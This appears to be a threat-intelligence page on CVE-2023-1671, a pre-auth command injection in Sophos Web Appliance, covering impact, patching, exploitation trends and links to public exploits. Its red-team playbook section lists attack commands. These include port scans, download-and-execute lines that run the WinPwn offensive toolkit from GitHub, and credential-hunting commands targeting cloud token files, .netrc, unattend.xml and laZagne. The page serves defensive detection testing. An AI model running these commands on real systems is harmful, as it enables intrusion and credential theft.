CVE-2023-1671
Overview
This vulnerability is a pre-authentication command injection flaw rooted in improper input sanitization within the warn-proceed handler of the Sophos Web Appliance. The affected component processes user-supplied parameters without adequate validation, enabling injection of arbitrary shell commands. Specifically, the vulnerability resides in the handling of parameters passed to the POST endpoint that controls blocked URL continuation logic.
Vulnerability Description
A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
Impact
An unauthenticated attacker can execute arbitrary system commands remotely on the vulnerable appliance, gaining full control over the system. This allows access to sensitive data, modification or disruption of web filtering services, and potential lateral movement within the network. No user interaction or credentials are required, making exploitation straightforward and enabling complete compromise of the device and its network environment.
Solution
To remediate this vulnerability, upgrade the Sophos Web Appliance to version 4.3.10.4 or later as specified in Sophos Security Advisory SA-2023-04-04-SWA-RCE. The vendor provides detailed patch instructions and mitigation guidance at https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce. Applying the official update eliminates the command injection flaw in the warn-proceed handler.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the warn-proceed handler of the Sophos Web Appliance presents a significant security risk due to its nature as a pre-authentication command injection flaw. This type of vulnerability allows an attacker to inject arbitrary commands into the system without needing to authenticate, effectively bypassing security controls that would typically restrict access to sensitive functionalities. The flaw exists in versions of the product prior to 4.3.10.4, which means that any organization using an outdated version is at risk. The exploitation of this vulnerability can lead to unauthorized access and control over the affected device, allowing attackers to execute arbitrary code, manipulate system configurations, or even deploy malware.
Attack vectors for this vulnerability are particularly concerning due to the ease with which they can be exploited. An attacker could leverage various methods, such as sending specially crafted HTTP requests to the web interface of the appliance. Given that the vulnerability is pre-authentication, attackers do not need valid credentials to initiate an attack, making it accessible to anyone with knowledge of the exploit. Scenarios could include an attacker targeting a public-facing web interface, using automated scripts to probe for vulnerable devices, or employing social engineering tactics to trick users into accessing malicious links that exploit the vulnerability. The potential for widespread exploitation is high, especially in environments where the Sophos Web Appliance is deployed as a critical component of network security.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on the Sophos Web Appliance for web filtering and threat management. Successful exploitation could lead to data breaches, loss of sensitive information, and significant disruption of services. The business risks associated with such incidents include financial losses, reputational damage, and potential legal ramifications stemming from non-compliance with data protection regulations. Furthermore, the high CVSS score of 9.8 indicates that this vulnerability poses a critical threat, necessitating immediate attention from security teams to mitigate potential risks.
To detect and mitigate this vulnerability, organizations should prioritize updating their Sophos Web Appliance to the latest version, specifically version 4.3.10.4 or later, where the flaw has been addressed. Regular patch management practices are essential to ensure that all software components are kept up to date. Additionally, organizations should implement network segmentation to limit the exposure of critical systems to the internet and employ intrusion detection systems to monitor for unusual activity that could indicate an attempted exploitation. Conducting regular security assessments and penetration testing can also help identify vulnerabilities before they can be exploited by malicious actors.
In conclusion, the command injection vulnerability in the warn-proceed handler of the Sophos Web Appliance represents a critical threat that requires immediate action from affected organizations. By understanding the technical details, potential attack vectors, and real-world implications, security teams can better prepare to defend against such vulnerabilities. Implementing robust detection and mitigation strategies will not only protect the integrity of the web appliance but also safeguard the broader organizational infrastructure from the risks associated with unauthorized access and exploitation.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-1671, evidenced by new detections after a period of quiescence. This resurgence coincides with the recent inclusion of the vulnerability in the KEV catalog, which may be contributing to increased attacker focus and activity. Although the EPSS score remains high and stable, the sudden uptick in telemetry suggests adversaries are actively leveraging publicly available proof-of-concept exploits to probe and potentially compromise vulnerable Sophos Web Appliance instances. This development elevates the immediacy of the threat, underscoring a heightened risk of pre-auth remote code execution attacks that could lead to full system compromise. Defenders should interpret this trend as an indicator of growing exploitation momentum, which may presage broader targeting campaigns or integration into more sophisticated attack frameworks.
Update 2 — July 04, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the Sophos Web Appliance vulnerability CVE-2023-1671. Our telemetry indicates an increased frequency of probes leveraging publicly available proof-of-concept exploits, reflecting a growing adversary interest in this critical pre-auth command injection flaw. Although the EPSS score remains at an extremely high and stable level, the uptick in detection activity signals a shift from theoretical risk to active exploitation in the wild. This development is significant because it heightens the likelihood of successful remote code execution attacks that can lead to full system compromise, increasing the urgency for defenders to prioritize monitoring and response efforts. The evolving threat landscape suggests that threat actors may be integrating these exploits into broader attack campaigns, potentially including ransomware operations, thereby amplifying the overall risk posture associated with this vulnerability.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sophos | Web Appliance | All |
cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Sophos Web Appliance 4.3.10.4 - Pre-auth command injection | Behnam Abasi Vanda | webapps | php | - | View |
GitHub PoCs (4)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
W01fh4cker/CVE-2023-1671-POC
CVE-2023-1671-POC, based on dnslog platform
|
W01fh4cker | 16 | 3 | 2023-04-24 | View |
|
ohnonoyesyes/CVE-2023-1671
Pre-Auth RCE in Sophos Web Appliance
|
ohnonoyesyes | 3 | 1 | 2023-04-23 | View |
|
csffs/cve-2023-1671
Exploit to cve-2023-1671. So there is a test and exploitation function. The test sends a ping request to the dnslog doma...
|
csffs | 0 | 1 | 2023-05-17 | View |
|
PoC
|
- | 0 | 0 | - | View |
Threat Feed
7 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-1671 |
| sophos.com |
GitHub CVE
|
https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/172016/Sophos-Web-Appliance-4.3.10.4-Command-Injection.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-1671 |